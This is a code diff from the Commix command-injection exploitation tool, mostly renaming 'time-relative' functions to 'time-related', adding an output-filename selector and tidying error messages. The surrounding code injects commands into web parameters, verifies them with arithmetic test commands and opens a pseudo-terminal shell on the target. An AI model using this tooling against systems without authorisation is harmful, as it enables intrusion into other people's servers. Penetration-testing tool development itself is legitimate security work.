@@ -3,7 +3,7 @@
 
 """
 This file is part of Commix Project (https://commixproject.com).
-Copyright (c) 2014-2024 Anastasios Stasinopoulos (@ancst).
+Copyright (c) 2014-2025 Anastasios Stasinopoulos (@ancst).
 
 This program is free software: you can redistribute it and/or modify
 it under the terms of the GNU General Public License as published by
@@ -43,7 +43,10 @@ Exit handler
 def exit_handler(no_result):
   if no_result:
     if settings.VERBOSITY_LEVEL == 0 and settings.LOAD_SESSION == None:
-      settings.print_data_to_stdout(settings.SINGLE_WHITESPACE)
+      if not settings.RESPONSE_DELAYS:
+        settings.print_data_to_stdout(settings.SINGLE_WHITESPACE)
+      else:
+        settings.RESPONSE_DELAYS = False
     return False
   else :
     settings.print_data_to_stdout(settings.END_LINE.CR)
@@ -105,13 +108,13 @@ def pseudo_terminal_shell(injector, separator, maxlen, TAG, cmd, prefix, suffix,
             time.sleep(timesec)
             if menu.options.ignore_session or session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
               # The main command injection exploitation.
-              if settings.TIME_RELATIVE_ATTACK:
+              if settings.TIME_RELATED_ATTACK:
                 if technique == settings.INJECTION_TECHNIQUE.TIME_BASED:
                   check_exec_time, shell = injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response, technique)
                 else:
                   check_exec_time, shell = injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response, technique)
                 # Export injection result
-                checks.time_relative_export_injection_results(cmd, separator, shell, check_exec_time)
+                checks.time_related_export_injection_results(cmd, separator, shell, check_exec_time)
               else:
                 if technique == settings.INJECTION_TECHNIQUE.FILE_BASED:
                   response = injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, technique)
@@ -164,9 +167,9 @@ def pseudo_terminal_shell(injector, separator, maxlen, TAG, cmd, prefix, suffix,
     settings.print_data_to_stdout(settings.END_LINE.CR)
 
 """
-The main time-relative exploitation proccess.
+The main Time-related exploitation proccess.
 """
-def do_time_relative_proccess(url, timesec, filename, http_request_method, url_time_response, injection_type, technique, tmp_path):
+def do_time_related_proccess(url, timesec, filename, http_request_method, url_time_response, injection_type, technique, tmp_path):
 
   counter = 1
   num_of_chars = 1
@@ -177,11 +180,11 @@ def do_time_relative_proccess(url, timesec, filename, http_request_method, url_t
   false_positive_warning = False
   export_injection_info = False
   exec_time = 0
-  timesec = checks.time_relative_timesec(timesec)
+  timesec = checks.time_related_timesec()
 
-  if settings.TIME_RELATIVE_ATTACK == False:
-    checks.time_relative_attaks_msg()
-    settings.TIME_RELATIVE_ATTACK = None
+  if settings.TIME_RELATED_ATTACK == False:
+    checks.time_related_attaks_msg()
+    settings.TIME_RELATED_ATTACK = None
 
   # Check if defined "--url-reload" option.
   if menu.options.url_reload == True:
@@ -223,7 +226,8 @@ def do_time_relative_proccess(url, timesec, filename, http_request_method, url_t
                 settings.TIME_BASED_STATE = True
               elif technique == settings.INJECTION_TECHNIQUE.TEMP_FILE_BASED:  
                 settings.TEMPFILE_BASED_STATE = True
-                OUTPUT_TEXTFILE = tmp_path + TAG + settings.OUTPUT_FILE_EXT
+                #OUTPUT_TEXTFILE = tmp_path + TAG + settings.OUTPUT_FILE_EXT
+                OUTPUT_TEXTFILE = injector.select_output_filename(technique, tmp_path, TAG)
               cmd = shell = ""
               checks.check_for_stored_tamper(payload)
               settings.FOUND_EXEC_TIME = exec_time
@@ -244,7 +248,8 @@ def do_time_relative_proccess(url, timesec, filename, http_request_method, url_t
             alter_shell = menu.options.alter_shell
             tag_length = len(TAG) + 4
             if technique == settings.INJECTION_TECHNIQUE.TEMP_FILE_BASED:
-              OUTPUT_TEXTFILE = tmp_path + TAG + settings.OUTPUT_FILE_EXT
+              #OUTPUT_TEXTFILE = tmp_path + TAG + settings.OUTPUT_FILE_EXT
+              OUTPUT_TEXTFILE = injector.select_output_filename(technique, tmp_path, TAG)
             for output_length in range(1, int(tag_length)):
               try:
                 # Tempfile-based decision payload (check if host is vulnerable).
@@ -273,8 +278,8 @@ def do_time_relative_proccess(url, timesec, filename, http_request_method, url_t
                   else:
                     percent = ""
                 else:
-                  if checks.time_relative_shell(url_time_response, exec_time, timesec):
-                    # Time relative false positive fixation.
+                  if checks.time_related_shell(url_time_response, exec_time, timesec):
+                    # Time related false positive fixation.
                     false_positive_fixation = False
                     if len(TAG) == output_length:
 
@@ -311,15 +316,15 @@ def do_time_relative_proccess(url, timesec, filename, http_request_method, url_t
 
                       if settings.TARGET_OS == settings.OS.WINDOWS:
                         if alter_shell:
-                          if technique == settings.INJECTION_TECHNIQUE.TIME_BASED: 
-                            cmd = settings.WIN_PYTHON_INTERPRETER + "python.exe -c \"print (" + str(randv1) + " + " + str(randv2) + ")\""
-                          else:
-                            cmd = settings.WIN_PYTHON_INTERPRETER + " -c \"print (" + str(randv1) + " + " + str(randv2) + ")\""
+                          # if technique == settings.INJECTION_TECHNIQUE.TIME_BASED: 
+                          #   cmd = settings.WIN_PYTHON_INTERPRETER + "python.exe -c \"print (" + str(randv1) + " + " + str(randv2) + ")\""
+                          # else:
+                          cmd = settings.WIN_PYTHON_INTERPRETER + " -c \"print (" + str(randv1) + " + " + str(randv2) + ")\""
                         else:
                           rand_num = randv1 + randv2
                           cmd = "powershell.exe -InputFormat none write (" + str(rand_num) + ")"
                       else:
-                        if technique == settings.INJECTION_TECHNIQUE.TIME_BASED:
+                        if technique == settings.INJECTION_TECHNIQUE.TIME_BASED or technique == settings.INJECTION_TECHNIQUE.TEMP_FILE_BASED:
                           cmd = "expr " + str(randv1) + " %2B " + str(randv2) + ""
                         else:
                           cmd = "echo $((" + str(randv1) + " %2B " + str(randv2) + "))"
@@ -333,7 +338,7 @@ def do_time_relative_proccess(url, timesec, filename, http_request_method, url_t
                       else:  
                         exec_time, output = injector.false_positive_check(separator, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, randvcalc, alter_shell, exec_time, url_time_response, false_positive_warning, technique)
 
-                      if checks.time_relative_shell(url_time_response, exec_time, timesec):
+                      if checks.time_related_shell(url_time_response, exec_time, timesec):
                         if str(output) == str(randvcalc) and len(TAG) == output_length:
                           possibly_vulnerable = True
                           exec_time_statistic = 0
@@ -386,7 +391,7 @@ def do_time_relative_proccess(url, timesec, filename, http_request_method, url_t
 
           # Yaw, got shellz!
           # Do some magic tricks!
-          if checks.time_relative_shell(url_time_response, exec_time, timesec):
+          if checks.time_related_shell(url_time_response, exec_time, timesec):
             if (len(TAG) == output_length) and (possibly_vulnerable == True or settings.LOAD_SESSION and int(is_vulnerable) == settings.INJECTION_LEVEL):
               found = True
               no_result = False
@@ -433,7 +438,7 @@ def do_results_based_proccess(url, timesec, filename, http_request_method, injec
   call_tmp_based = False
   next_attack_vector = False
   export_injection_info = False
-  timesec = checks.time_relative_timesec(timesec)
+  timesec = checks.time_related_timesec()
   
   if technique == settings.INJECTION_TECHNIQUE.CLASSIC:
     try:
@@ -489,7 +494,9 @@ def do_results_based_proccess(url, timesec, filename, http_request_method, injec
               if technique == settings.INJECTION_TECHNIQUE.FILE_BASED: 
                 settings.FILE_BASED_STATE = True
                 checks.check_for_stored_tamper(payload)
-                OUTPUT_TEXTFILE = TAG + settings.OUTPUT_FILE_EXT
+                #OUTPUT_TEXTFILE = TAG + settings.OUTPUT_FILE_EXT
+                tmp_path = ""
+                OUTPUT_TEXTFILE = injector.select_output_filename(technique, tmp_path, TAG)
                 if re.findall(settings.DIRECTORY_REGEX,payload):
                   filepath = re.findall(settings.DIRECTORY_REGEX,payload)[0]
                   settings.WEB_ROOT = os.path.dirname(filepath)
@@ -515,7 +522,8 @@ def do_results_based_proccess(url, timesec, filename, http_request_method, injec
 
             if technique == settings.INJECTION_TECHNIQUE.FILE_BASED:
               # The output file for file-based injection technique.
-              OUTPUT_TEXTFILE = TAG + settings.OUTPUT_FILE_EXT
+              #OUTPUT_TEXTFILE = TAG + settings.OUTPUT_FILE_EXT
+              OUTPUT_TEXTFILE = injector.select_output_filename(technique, tmp_path, TAG)
             else:
               randv1 = random.randrange(100)
               randv2 = random.randrange(100)
@@ -558,7 +566,7 @@ def do_results_based_proccess(url, timesec, filename, http_request_method, injec
                   if type(response) is bool:
                     html_data = ""
                   else:
-                    html_data = checks.page_encoding(response, action="decode")
+                    html_data = checks.process_page_content(response, action="decode")
                   shell = re.findall(r"" + TAG + "", str(html_data))
                   if len(shell) == 0 :
                     raise _urllib.error.HTTPError(url, int(settings.NOT_FOUND_ERROR), 'Error', {}, None)
@@ -583,7 +591,7 @@ def do_results_based_proccess(url, timesec, filename, http_request_method, injec
                           continue
                         else:
                           raise
-                      checks.use_temp_folder(no_result, url, timesec, filename, tmp_path, http_request_method, url_time_response)
+                      checks.use_temp_folder(no_result, url, timesec, filename, http_request_method, url_time_response)
                     else:
                       if checks.finalize(exit_loops, no_result, float_percent, injection_type, technique, shell):
                         continue
@@ -596,7 +604,7 @@ def do_results_based_proccess(url, timesec, filename, http_request_method, injec
                     checks.quit(filename, url, _ = False)
 
                   elif str(e.getcode()) == settings.FORBIDDEN_ERROR:
-                    err_msg = "You don't have access to this page: '" + settings.DEFINED_WEBROOT + "'."
+                    err_msg = "You do not have access to this page: '" + settings.DEFINED_WEBROOT + "'."
                     settings.print_data_to_stdout(settings.print_critical_msg(err_msg))
                     checks.quit(filename, url, _ = False)
 
@@ -613,7 +621,7 @@ def do_results_based_proccess(url, timesec, filename, http_request_method, injec
 
             except _urllib.error.URLError as e:
               if technique == settings.INJECTION_TECHNIQUE.FILE_BASED:
-                warn_msg = "It seems that you don't have permissions to "
+                warn_msg = "It seems you do not have permission to "
                 warn_msg += "read and/or write files in directory '" + settings.WEB_ROOT + "'."
                 settings.print_data_to_stdout(settings.END_LINE.CR + settings.print_warning_msg(warn_msg))
                 err_msg = str(e).replace(": "," (") + ")."
@@ -647,8 +655,10 @@ def do_results_based_proccess(url, timesec, filename, http_request_method, injec
             else:
               whitespace = settings.WHITESPACES[0]
             cmd = maxlen =  ""
+            if not 'url_time_response' in locals():
+              url_time_response = ""
             if technique != settings.INJECTION_TECHNIQUE.FILE_BASED:
-              OUTPUT_TEXTFILE = url_time_response = ""
+              OUTPUT_TEXTFILE = ""
             # Check for any enumeration options.
             enumeration.stored_session(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response, technique)
             # Check for any system file access options.
